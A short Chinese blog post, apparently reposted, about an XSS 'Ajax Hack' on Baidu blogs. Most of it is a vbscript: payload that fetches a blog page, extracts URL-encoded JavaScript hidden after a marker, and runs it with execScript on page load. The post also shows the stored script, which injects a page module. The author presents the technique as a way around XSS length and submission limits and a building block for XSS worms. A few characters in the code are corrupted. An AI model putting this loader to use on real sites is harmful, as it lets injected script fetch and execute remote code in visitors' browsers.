今天在梦之光芒的BLOG上看见了一个Ajax Hack示范,其实跨站发现很容易,但是要做到大危害还是很难,偷偷COOKIE什么的只针对用户而已,XSS WORM的那种利用才是可怕的,
来看看他的一段VBSCRIPT脚本
vbscript.:execute("
dim l,s:
l=chr(13)+chr(10):
s=""sub mycode""&l:
s=s&""dim http,url,pg,p,p2,cd,ht,o""&l:
s=s&""url=""""http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html""""""&l:
s=s&""set http=createobject(""""Microsoft.XMLHTTP"""")""&l:
s=s&""http.open """"get"""",url,false""&l:
s=s&""http.send("""""""")""&l:
s=s&""pg=http.responseText""&l:
s=s&""p=instr(1,pg,""""ILOVEUNING-BEGIN"""")""&l:
s=s&""if p=null or p<1 then exit sub""&l:
s=s&""p=instr(p,pg,chr(37))""&l:
s=s&""if p=null or p<1 then exit sub""&l:
s=s&""p2=instr(p,pg,chr(60))""&l:
s=s&""cd=mid(pg,p,p2-p)""&l:
s=s&""ht=""""eval(unescape('""""&cd&""""'))""""""&l:
s=s&""window.execScript. ht,""""jscript""""""&l:
s=s&""end sub""&l:
execute(s):
document.body.οnlοad=getref(""mycode""):
")
调用代码 以下是代码片段:
ILOVEUNING-BEGIN%0D%0Avar%20lt%3DString.fromCharCode%2860%29%3B%0D%0Avar%20gt%3DString.fromCharCode%2862%29%3B%0D%0Avar%20dq%3DString.fromCharCode%2834%29%3B%0D%0Avar%20sq%3DString.fromCharCode%2839%29%3B%0D%0A%0D%0Afunction%20myRecentPosts%28n%29%0D%0A%7B%0D%0A%20var%20r%3D%27Data%20Unavailable%27%3B%0D%0A%20if%28window.ActiveXObject%3D%3Dnull%29%20return%20r%3B%0D%0A%20var%20xmlDoc%20%3D%20new%20ActiveXObject%28%27MSXML2.DOMDocument%27%29%3B%0D%0A%20if%28xmlDoc%3D%3Dnull%29%20return%20r%3B%0D%0A%20xmlDoc.async%20%3D%20false%3B%0D%0A%20xmlDoc.resolveExternals%20%3D%20false%3B%0D%0A%20if%28%21xmlDoc.load%28decodeURI%28myref%29+%27/rss%27%29%29%20return%20r%3B%0D%0A%20var%20oItems%3DxmlDoc.documentElement.selectNodes%28%27//item%27%29%3B%0D%0A%20if%28oItems%3D%3Dnull%29%20return%20r%3B%0D%0A%20r%3D%27%27%3B%0D%0A%20nItems%3DoItems.length%3B%0D%0A%20if%28nItems%3En%29%20nItems%3Dn%3B%0D%0A%20for%28i%3D0%3Bi%3CnItems%3Bi++%29%0D%0A%20%7B%0D%0A%20%20var%20t%2Cl%2Co%3B%0D%0A%20%20var%20oItem%3DoItems%28i%29%3B%0D%0A%20%20o%3DoItem.selectSingleNode%28%27title%27%29%3B%20if%28%21o%29continue%3B%20t%3Do.text%3B%0D%0A%20%20o%3DoItem.selectSingleNode%28%27link%27%29%3B%20if%28%21o%29continue%3B%20l%3Do.text%3B%0D%0A%20%20r+%3Dlt+%27a%20href%3D%27+dq+l+dq+%27%20target%3D_blank%27+gt+%27%u2606%20%27+t+lt+%27/a%27+gt%3B%0D%0A%20%20r+%3Dlt+%27br%20/%27+gt%3B%0D%0A%20%7D%0D%0A%20r+%3Dlt+%27div%20class%3Dline%27+gt+lt+%27/div%27+gt%3B%0D%0A%20return%20r%3B%0D%0A%7D%0D%0A%0D%0Afunction%20myAddMod%28sWhere%2CsId%2CsTargetId%2CsTitle%2CsHTML%29%0D%0A%7B%0D%0A%20var%20ot%3Ddocument.getElementById%28sTargetId%29%3B%0D%0A%20if%28ot%3D%3Dnull%29%20return%3B%0D%0A%20var%20s%3Dlt+%27div%20class%3Dmod%20id%3D%27+sId+gt%3B%0D%0A%20s+%3Dlt+%27table%20class%3Dmodth%20cellSpacing%3D0%20cellPadding%3D0%20width%3D100%25%20border%3D0%27+gt%3B%0D%0A%20s+%3Dlt+%27tbody%27+gt+lt+%27tr%27+gt%3B%0D%0A%20s+%3Dlt+%27td%20class%3Dmodtl%20width%3D7%27+gt+%27%20%27+lt+%27/td%27+gt%3B%0D%0A%20s+%3Dlt+%27td%20class%3Dmodtc%20noWrap%27+gt+lt+%27div%20class%3Dmodhead%27+gt+lt+%27span%20class%3Dmodtit%27+gt+sTitle+lt+%27/span%27+gt+lt+%27/div%27+gt+lt+%27/td%27+gt%3B%0D%0A%20s+%3Dlt+%27td%20class%3Dmodtc%20noWrap%20align%3Dright%27+gt+lt+%27/td%27+gt%3B%0D%0A%20s+%3Dlt+%27td%20class%3Dmodtr%20width%3D7%27+gt+%27%20%27+lt+%27/td%27+gt%3B%0D%0A%20s+%3Dlt+%27/tr%27+gt+lt+%27/tbody%27+gt+lt+%27/table%27+gt%3B%0D%0A%20s+%3Dlt+%27div%20class%3Dmodbox%20id%3Dm_%27+sId+gt+sHTML+lt+%27/div%27+gt%3B%0D%0A%20s+%3Dlt+%27/div%27+gt%3B%0D%0A%20ot.insertAdjacentHTML%28sWhere%2C%20s%29%3B%0D%0A%7D%0D%0A%0D%0AmyAddMod%28%27afterEnd%27%2C%27mod_myrecent%27%2C%27mod_profile%27%2C%27%u6700%u8FD1%u53D1%u8868%u6587%u7AE0%27%2CmyRecentPosts%2810%29%29%3B
这样就实现了本站调用代码,换个思路,是否这就解决了Ajax Hack常用的的提交数据限制(站外提交没有权限,XSS代码长度限制)的问题,呵呵~这里我也没实验,一个有趣的Ajax Hack示范》(https://www.unjs.com)。
再还有一个思路就是剑心的分片写入脚本再eval出来~这两个思路结合起来,也许我们就能在苛刻的XSS漏洞上创造奇迹!